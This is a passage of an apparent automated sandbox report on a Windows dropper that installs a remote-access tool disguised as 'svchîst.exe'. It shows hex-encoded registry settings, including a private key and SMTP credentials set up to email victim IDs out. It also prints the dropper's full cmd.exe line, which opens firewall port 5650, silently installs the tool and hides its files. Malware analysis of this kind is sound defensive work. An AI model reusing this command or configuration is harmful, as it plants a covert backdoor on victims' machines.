d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e747275653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3636302d3439362d3234362d3436323c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465a6e565657564a36515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d453155593364505645457a5456524b59555a334d48704e616b4577436b3155555864505645457a5456524b5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651573147616b564e64546c6965554e316545316f5131426e55793947436d31736345525a53466455596e5a555a47393463484a4362474a306457684f5546464e6546677a56484a615757517a5133557955545a764d31524b5a4868755a7a42336257633056446c334d55465652564e6c6433674b554768564d6b55325131524b54306334536e464356566b30543346434b31646e564778685545707356554d7762465a6f636b706f4d4446314f5535506157633357565a34646d3134626d4a735258457a544535585651704d4d7a42686257746e5431567a595464494d574a5464334251576c523352564a464f45684862455a4a6158467851585a6e4e6b74734e335a52546a6c556257354261545242617a524f4d6c52745745356a54303558436e6c6b57466379656b45784d466431576b6c7461464930547a427655476476557a4e694e4646496557647653544254597a5a4c51314130576d645165464278656c4e465a6b565057474e6d5333677a656e4e6e616c454b57454e595247703359314530527a565859334e7852336c334e5755354d324a50575546444d31465865557843536d6470553346705746565163315535547a4a6a526d784c5a6d786b556b4e535746687a655452516177706a55556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b4652516c4d7a5a6e55304e6b6833526e524c553349304c305a79535531334e444e6155336c465a545247436b4e6b597a4a765a335245566a45344d6e4d3553585671646d7378566c6c56576a646b656e4a684d4535566333647864554a464d485657544555335446564a596e526e4e7a457952555a5553574a7651584d315a6b6b4b536e70614f444533535446574e45787554454531624646534f44686b623278614d43387755324a4656464671566d64336430743053575275616c64694e6d6c70575534325545394255564679526d4e7659576f7a4f51704d63456c364d7a5252555546324d32396a5a6b6733655538325555707a645578355369395155556732576d784554544e515a6b686c52474651596b5247555535484e6a45795131565352576c504e316c5257566c6f436c7031593268345a4841345647315356544a6e5348424c5269744a57555248626c6c4f59565a59627a4d3254554a334e584e4751315a465656677855445935595452355432394a566e4e4c596d685a5a476f76526d6f4b6432744d6157314d625556334e444658516b677a56584e6a655868455355387954576c58654777725a546476534442354d475a465530314e59576c4c524746325a32314355533878516b674b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a5355563255556c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746a6432646e553270425a3056425157394a516b465251316c58545646354e7a46325355733352586b4b52556b72516b7734563246586130356e5a46704f64546c4f4d6d704862584e48566e55794e6b55774f554636526d5a6b5433527361444e6a537a6461524846715a4531734d30646c524652445955526f55444e455651704355564a4b4e3052464b305a5557565276536b31724e474a3362573947556d706e4e6d39494e57464354315a764f47315755557854566c644863323149564663334d44413253305230614668484b324a485a485656436c4e7959334d78576c46325a6c4a7859564e424e564e34636e4e6d566e524d5132733562464242556b565564324e685656567053334676517974456233465964546c424d7a465059574e44544764445647637a576b384b576d4d78647a5178596b6f785a474a6954555259556d453161326c68526b686e4e314e6e4b304e6f544752326145466d53304e6e616c4a4b656d39765353396f6255457652537479546b6c534f4645315a486734636770495a6b3935513035435930706a543142436545526e596d786165586c76596b78456244637a5a484d315a30464d5a454a6953584e4662554e4b5333464b5a464572654651774e317033563156774b31597852557047436d526c656b786e4b314a345157644e516b464252554e6e5a305642566d523051586833646b74434b32524964444657536a5a774e556874536b357051565635516e6c45614578685154524f57484e6b513352746130674b5933686a4d6b3556526d7049556e427152577454545567794e5551774f555a4d6455394f625642566330706f556b3548644668775933706e5757464e596d77724f444e335930563451334e51625556495553746e554170455a474e5056324659656b7835536d4a4b4d69394d4b314578626a4274655445726133467164336734654752725457524f524556346130467554456c7254315a6d6456527a637a6b324d474a474c336c545a57744d436c704b65564e53536b6c4e537a633453586b7262335a4f6446644b4c326b725131706d55476446524556796247467457446848616b4e4653315a4364473177616a686f4e574a4864315a51545668474c3239466248514b5933704662546453537a5a73616d4a424e6c6f7a5530467864327835616b78585931704855307051536b3877546d4e525430356e4b31464356484e566253396b566a6c7364446c7a65444273516a6c5a596a5a4562777044617a425356484e47643052484b335a68515652685a546c5159545235617a527161544d344d5856725a30313253565a5864546c4a4d6c464c516d645252455931624870345153394353556c485356707253326f34436b525a615752584c79744b656e6f7a4d57524962304a7565484a304e4768614c337031553349334e4756434b336452656a52704e444e555a30786c656e6c305957745a644452745a6a4269566d6c46624535594d6c594b4e6b6c6b576b56484e544e30576d7445533156484f56557753444a6d65474e50546c4a6e52576843565734796147397055336f72566b5a334e454e61544842784d5456765a464a714f455a6c544849344e57524657516f324e444e715355637252304649546b5251616d6c75626b526d57456c3564315243643074435a314645526b567a51564e56546b67305247647657546446624774784b334d3053446c5a513074445956564a4d6e6335436a683457557831566b356d5769746e5531463156545657536e524b4d6c5a4c5155684c625730344e55647a59303533617a513162336f77563074555a484e4c565574684e476c514e6d51724f55314c596d5675537a494b54336455616a4d796446423554444252546d316a5a584655566e564954444a794e324e6d4d6939305433564a5a6a4a48634539535a454578616d557a55486c6e6555355662334e425644464364306c526546647557416f76556c52554d6b55795633683353304a6e516c645652334e7752546468654642784e6b74344c315a7a54325279613049775557784d655746314e79746162544e785754524c64585978555841726343396e596a4252436d6b355445566b546d316c4e325977654768694e6d3961516d4a5257545a4d576d49784c3070534d584255545734336348426a53486f77557a466f525556514b32746f517a52776455527964464e544e445a714d6d634b5455677855586c356430317057554e4756487061596b7776616b5a4e6146673463476869654656444d58686a5a465577545770555a31553352575a57596d396e4f556b7a5233706e566a6c426230644351557071645170346145783362564e44643252495230637a51316335636b5a75646d6c79627a6c33613070325a334d3153566445526d4d33616b453161555654656d315254444a6d4d553835656b644a557a4e44656e52464d7a424a436c56444e5739585a30466e56336c72623235715458646955335635656d67325a475a744c7a6c6f51585668626c59335a336449647a4e33566b4a576144523563484a33596a4a566445746955575a54556b74485156674b616b704565566c544d44464d59304578533255334d457377596c6f305a44647a5554465256575a3152466c544d5535706347744f4f5546765230466d554464776557745a566d6c4d593152555131564d556d39705741704a645668356156565356484677646d4a47627a564e5557395054304e4d4d484a424e55707864324532597a564d617a56524d6b5a6d564642525a476c485132684262473034596c4a79563252575a3235474d484e53436e6f77613159766248597a65444a7356464a5063334e4452565a4953476c79523141314d6b4a706456463151586c474f58597a5a47684b6144527553575a794c7a6450646e64304d7a646a55486c304f474d7262486f4b626b685252585242566c6c525358557956325179615564744d336778566a6739436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe
"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit
C:\Windows\SysWOW64\cmd.exe
